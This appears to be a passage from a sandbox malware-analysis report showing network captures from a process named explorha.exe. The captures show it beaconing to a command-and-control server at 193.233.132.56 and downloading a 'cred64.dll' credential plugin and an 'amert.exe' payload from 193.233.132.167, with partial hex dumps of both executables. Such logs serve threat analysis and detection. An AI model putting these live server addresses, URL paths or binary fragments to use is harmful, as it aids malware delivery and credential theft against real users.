                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.060080051 CEST1.1.1.1192.168.2.50xaa5bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.011050940 CEST1.1.1.1192.168.2.50xfe73No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.008399010 CEST1.1.1.1192.168.2.50x4425No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.292335033 CEST1.1.1.1192.168.2.50x14f1No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.549713193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.313673019 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.558506012 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560514927 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.820668936 CEST558INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 30 30 30 35 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 63 35 31 34 34 66 36 39 65 35 65 36 37 65 65 38 30 31 35 66 38 31 35 64 62 32 63 64 30 61 30 61 33 65 36 32 36 62 33 66 63 66 37 62 36 35 38 37 66 61 30 65 31 37 65 37 36 23 31 30 30 30 30 35 35 30 30 31 2b 2b 2b 65 33 31 32 64 33 36 31 31 65 66 34 39 66 61 31 66 34 35 62 35 39 65 61 39 66 35 65 37 61 66 31 38 32 31 34 65 34 30 61 64 63 32 64 63 38 65 32 61 37 65 31 32 64 66 39 62 32 65 38 62 32 34 34 36 66 65 31 65 39 32 38 37 36 36 61 64 61 23 31 30 30 30 30 35 36 30 30 31 2b 2b 2b 65 33 31 32 64 33 36 31 31 65 66 34 39 66 61 31 66 34 35 62 35 39 65 61 39 66 35 65 37 61 66 31 38 32 31 34 65 34 30 61 64 63 32 64 63 38 65 32 61 39 65 37 33 30 65 38 62 32 65 38 62 32 34 34 36 66 65 31 65 39 32 38 37 36 36 61 64 61 23 31 30 30 30 30 35 37 30 33 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 63 35 31 34 34 66 36 39 65 35 65 36 37 65 65 38 30 31 35 66 38 31 35 64 62 32 63 64 30 61 65 61 35 66 62 33 37 62 33 65 65 66 62 61 31 35 38 36 61 61 30 65 31 37 65 37 36 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 16f <c>1000054001+++aa0ed36554e19fbffc5144f69e5e67ee8015f815db2cd0a0a3e626b3fcf7b6587fa0e17e76#1000055001+++e312d3611ef49fa1f45b59ea9f5e7af18214e40adc2dc8e2a7e12df9b2e8b2446fe1e928766ada#1000056001+++e312d3611ef49fa1f45b59ea9f5e7af18214e40adc2dc8e2a9e730e8b2e8b2446fe1e928766ada#1000057031+++aa0ed36554e19fbffc5144f69e5e67ee8015f815db2cd0aea5fb37b3eefba1586aa0e17e76#<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.549714193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.315207005 CEST69OUTGET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560641050 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:03 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 1285632
                                                                                                                                                                                                                                      Last-Modified: Sun, 03 Mar 2024 11:54:33 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "65e464f9-139e00"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$^^^_^_^_2^W_^W_^W_^_^^C^_^_^X^^_^Rich^PEdie" RhP` Xx `(0p .text `.rdata@@.dataLD@.pdata(`@@_RDATA@@.rsrc @@.reloc0@B
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560741901 CEST1289INData Raw: 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 97 6e 11 00 48 8d 0d e0 bb 12 00 e8 d3 20 0c 00 48 8d 0d 0c 85 0f 00 48 83 c4 28 e9 cf f2 0c 00 cc cc cc 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 8f 6e 11 00 48 8d 0d b0 c2 12 00 e8 a3 20 0c 00 48
                                                                                                                                                                                                                                      Data Ascii: H(A HnH HH(H(A HnH HLH(H(AHnHs HH(oH(A H_nHC HH(?H(AHWnH HH(
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560781956 CEST1289INData Raw: 83 c4 28 e9 ef ed 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 4f 6c 11 00 48 8d 0d b0 b5 12 00 e8 c3 1b 0c 00 48 8d 0d cc 8b 0f 00 48 83 c4 28 e9 bf ed 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 2f 6c 11 00 48 8d 0d c0 bd 12
                                                                                                                                                                                                                                      Data Ascii: (H(AHOlHHH(H(AH/lHHH(H(A(HlHcHLH(_H(AHlH3HH(/H(AHkHHH(
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560818911 CEST1289INData Raw: 8d 0d 4c 92 0f 00 48 83 c4 28 e9 df e8 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 57 69 11 00 48 8d 0d a0 b7 12 00 e8 b3 16 0c 00 48 8d 0d 8c 92 0f 00 48 83 c4 28 e9 af e8 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 37 69 11
                                                                                                                                                                                                                                      Data Ascii: LH(H(AHWiHHH(H(AH7iHHH(H(AHiHSHH(OH(AHhH#HLH(H(AHhH`H
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560858011 CEST1289INData Raw: 00 e8 d3 11 0c 00 48 8d 0d 0c 99 0f 00 48 83 c4 28 e9 cf e3 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 cf 67 11 00 48 8d 0d b0 b8 12 00 e8 a3 11 0c 00 48 8d 0d 4c 99 0f 00 48 83 c4 28 e9 9f e3 0c 00 cc cc cc 48 83 ec 28 41 b8 28 00 00
                                                                                                                                                                                                                                      Data Ascii: HH(H(A4HgHHLH(H(A(HgHsHH(oH(AHgHCHH(?H(A4HgHHH(H(A(HgH
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST1289INData Raw: c7 80 80 00 00 00 0f 00 00 00 88 50 68 48 89 90 98 00 00 00 48 c7 80 a0 00 00 00 0f 00 00 00 88 90 88 00 00 00 48 89 90 b8 00 00 00 48 c7 80 c0 00 00 00 0f 00 00 00 88 90 a8 00 00 00 48 89 90 d8 00 00 00 48 c7 80 e0 00 00 00 0f 00 00 00 88 90 c8
                                                                                                                                                                                                                                      Data Ascii: PhHHHHHHHHHH H8H@(HXH`HHxHhHHHH
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560937881 CEST1289INData Raw: 00 00 0f 00 00 00 88 90 c8 00 00 00 48 89 90 f8 00 00 00 48 c7 80 00 01 00 00 0f 00 00 00 88 90 e8 00 00 00 48 89 90 18 01 00 00 48 c7 80 20 01 00 00 0f 00 00 00 88 90 08 01 00 00 48 89 90 38 01 00 00 48 c7 80 40 01 00 00 0f 00 00 00 88 90 28 01
                                                                                                                                                                                                                                      Data Ascii: HHHH H8H@(HXH`HHxHhHHHHHHHHHH
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560977936 CEST1289INData Raw: 00 0f 00 00 00 88 90 28 01 00 00 48 89 90 58 01 00 00 48 c7 80 60 01 00 00 0f 00 00 00 88 90 48 01 00 00 48 89 90 78 01 00 00 48 c7 80 80 01 00 00 0f 00 00 00 88 90 68 01 00 00 48 89 90 98 01 00 00 48 c7 80 a0 01 00 00 0f 00 00 00 88 90 88 01 00
                                                                                                                                                                                                                                      Data Ascii: (HXH`HHxHhHHHHHHHHHH H8H@(HXH`HHxH
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561017036 CEST1289INData Raw: 00 48 8d 0d c5 9a 0f 00 e9 b4 cf 0c 00 48 8d 0d 15 9b 0f 00 e9 a8 cf 0c 00 48 8d 0d 49 9b 0f 00 e9 9c cf 0c 00 48 83 ec 28 48 8d 0d 75 b8 12 00 e8 ac dc 0c 00 48 8d 0d 75 9b 0f 00 48 83 c4 28 e9 7c cf 0c 00 b8 01 00 00 00 c3 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: HHHIH(HuHuH(|H\$Hl$Ht$ WAVHLTAL5GL@AAt'AB0TB82TuIIEAExAB0TAB0T+uHE3LHuED8t
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561055899 CEST1289INData Raw: 8b 57 10 48 8b cb e8 41 b8 06 00 48 8b 3f 48 85 ff 75 ec 48 8b 7e 10 48 85 ff 74 14 48 8b 57 10 48 8b cb e8 74 38 04 00 48 8b 3f 48 85 ff 75 ec 8b 43 28 41 ff c7 48 83 c5 20 44 3b f8 0f 8c 49 ff ff ff 48 8b 6c 24 20 4c 89 b3 20 03 00 00 41 8b fe
                                                                                                                                                                                                                                      Data Ascii: WHAH?HuH~HtHWHt8H?HuC(AH D;IHl$ L A~0IHC HL0HtD8qtiuUH ;{(|HL$(D$0DuH{HL$0H AD$0HtgfDHHE^L9 tHH1-3H;hr"H;psH`
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806427002 CEST1289INData Raw: 95 c0 88 46 2b 33 c0 eb 05 b8 01 00 00 00 48 8b 4c 24 78 48 33 cc e8 28 bf 0c 00 4c 8d 9c 24 80 00 00 00 49 8b 5b 20 49 8b 6b 30 49 8b e3 41 5e 5f 5e c3 48 83 ec 08 80 79 2a 00 4c 8b d9 0f 85 2e 01 00 00 80 79 28 00 48 89 1c 24 74 0c 8b 41 08 44
                                                                                                                                                                                                                                      Data Ascii: F+3HL$xH3(L$I[ Ik0IA^_^Hy*L.y(H$tADIYAAD@AC*AAIDOQADAADhAAOiQQDAADAlDiAAAA+


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.549715193.233.132.167804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.067647934 CEST55OUTGET /mine/amert.exe HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311078072 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:04 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 1905152
                                                                                                                                                                                                                                      Last-Modified: Fri, 19 Apr 2024 00:37:12 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "6621bcb8-1d1200"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2a 52 e4 13 6e 33 8a 40 6e 33 8a 40 6e 33 8a 40 35 5b 89 41 60 33 8a 40 35 5b 8f 41 f0 33 8a 40 bb 5e 8e 41 7c 33 8a 40 bb 5e 89 41 7a 33 8a 40 bb 5e 8f 41 1b 33 8a 40 35 5b 8e 41 7a 33 8a 40 35 5b 8b 41 7d 33 8a 40 6e 33 8b 40 ba 33 8a 40 f5 5d 83 41 6f 33 8a 40 f5 5d 75 40 6f 33 8a 40 f5 5d 88 41 6f 33 8a 40 52 69 63 68 6e 33 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 15 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 aa 01 00 00 00 00 00 00 50 4b 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4b 00 00 04 00 00 4a 61 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 06 00 6a 00 00 00 00 60 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 3b 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 3b 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 60 06 00 00 02 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 62 75 70 79 62 6b 65 00 00 1a 00 00 40 31 00 00 fe 19 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6a 78 71 61 69 64 73 00 10 00 00 00 40 4b 00 00 06 00 00 00 ea 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4b 00 00 22 00 00 00 f0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$*Rn3@n3@n3@5[A`3@5[A3@^A|3@^Az3@^A3@5[Az3@5[A}3@n3@3@]Ao3@]u@o3@]Ao3@Richn3@PELePK@KJa@Vpj`;K;K P@.rsrc`@.idata p@ *@fbupybke@1@ejxqaids@K@.taggant0PK"@
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311096907 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311115026 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311134100 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311151028 CEST1289INData Raw: 27 19 9d c9 97 74 a1 fa 2a 90 cc 86 87 6a 55 58 a8 e8 51 83 27 40 40 54 96 59 fd 4a 1f ed 5d d2 47 cc 4d 60 4f b7 6c 2a d8 d1 15 fa 4c 08 b2 8a 27 59 ad 66 28 97 2d e2 8f 20 97 9e 10 0a a2 82 36 6f 21 13 50 00 76 5e 6f 9c 8d a2 2b d1 2c 4a 67 e9
                                                                                                                                                                                                                                      Data Ascii: 't*jUXQ'@@TYJ]GM`Ol*L'Yf(- 6o!Pv^o+,Jg=R>:uVoS?dE(j=J")&(b(1zGRWg(mA(S+cPf'X"Kp76%^g5b9Q}c(L=2&Oc3Y)9h=mb;c?,z
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311170101 CEST1289INData Raw: bc 12 63 86 98 98 a8 86 1e ae f2 73 58 03 eb 03 e2 3c 2e ce 49 50 0f 66 30 68 e9 08 0b 3a 33 ca 4c 41 b2 58 39 a0 a7 94 8e 21 92 9a 7e 7d ad 47 8d 25 c5 c7 0f 40 2a e1 15 96 54 40 a6 b5 72 94 89 0b 0a 5c 49 79 2a 6d 68 ce 9b 80 06 9f 44 92 91 21
                                                                                                                                                                                                                                      Data Ascii: csX<.IPf0h:3LAX9!~}G%@*T@r\Iy*mhD!#1c,~*o=zm$rYJ[~\$.]TP!#*,o(lEP ,ZNT?d'],]B5MP-KftJpVt=<pJ]
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311189890 CEST1289INData Raw: ff c3 89 cd 80 46 3d c2 5c 0e 66 28 2a 21 89 2c 25 d3 57 b0 5d 74 59 59 19 97 18 61 a9 1a 51 98 91 9e 2d 4f 7f b5 a8 50 7f 99 0f 86 bc bc b7 bf 1b df 93 3a c2 97 8a a7 41 1e 0d 40 0d f7 65 f0 04 21 89 9a e9 46 2a a2 13 ca 38 de c2 4d a3 c8 82 c5
                                                                                                                                                                                                                                      Data Ascii: F=\f(*!,%W]tYYaQ-OP:A@e!F*8Mxy!Y./Z,#qkSTt-''L3-6F/mN]5/)t1vqJVo)2[k;Opm~Xd^:{tMPJ%]v'l,8.}ZSd
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311207056 CEST1289INData Raw: 15 0c 80 5f 8c 8c 83 87 40 00 b0 65 86 a3 1e af e5 4d 4c 25 f9 4b 33 20 41 11 ae 1d 69 5a 49 f9 8f 0f 9f 58 47 11 c3 21 54 99 4a 57 45 42 41 5f 3e ba 51 57 45 5b 51 48 03 c1 5f a6 e6 e3 4b 2c 4a 5d b1 e7 c9 7d 40 fe 32 c9 41 20 29 68 42 59 50 f8
                                                                                                                                                                                                                                      Data Ascii: _@eML%K3 AiZIXG!TJWEBA_>QWE[QH_K,J]}@2A )hBYPY4m\|HRY/NF`|#Y_uHkY0/%ddF>mL*:,T<Kq*4O|>PJxpfQ-{7'jLtlVB5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311223984 CEST1289INData Raw: c8 cc 7d 6f 57 c9 01 8a 8d 59 53 2a 36 b7 6f 8d 1d 5b b8 1d aa 34 40 c1 8f 7a c9 fc 54 18 b0 84 1d 51 0d 42 55 2f 34 65 07 17 d2 cf 81 a1 25 34 6d 5a d5 4c db f8 bb 7b a6 74 9b a7 30 60 c1 3c 72 44 be 4d 2f d3 11 ed 3d e7 4c 7b 0f 4d b4 aa db 14
                                                                                                                                                                                                                                      Data Ascii: }oWYS*6o[4@zTQBU/4e%4mZL{t0`<rDM/=L{M&Ks!*a"WBY/SOJ/ ")$"jhn<a&Gr:*2MR0:0/*YgLGb(c-ipH@ EcZ6aT>hM(t'S+EUXxGPg
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.311242104 CEST1289INData Raw: 93 82 4d cf 49 a5 4b 0d 30 46 71 2b b4 e3 d5 fc 94 3c ba 3a 14 e9 8c 85 b4 52 8a cf 89 1d c5 e8 4b 92 53 87 c4 96 52 15 85 91 4c 90 2e 42 5a 10 55 3d 2d 2a 0f e8 2c 81 05 21 3b 0a bf 2a 47 44 46 5b b7 0d 90 37 4a c2 8a 4d 6d 4c cb fd 3e d5 73 5d
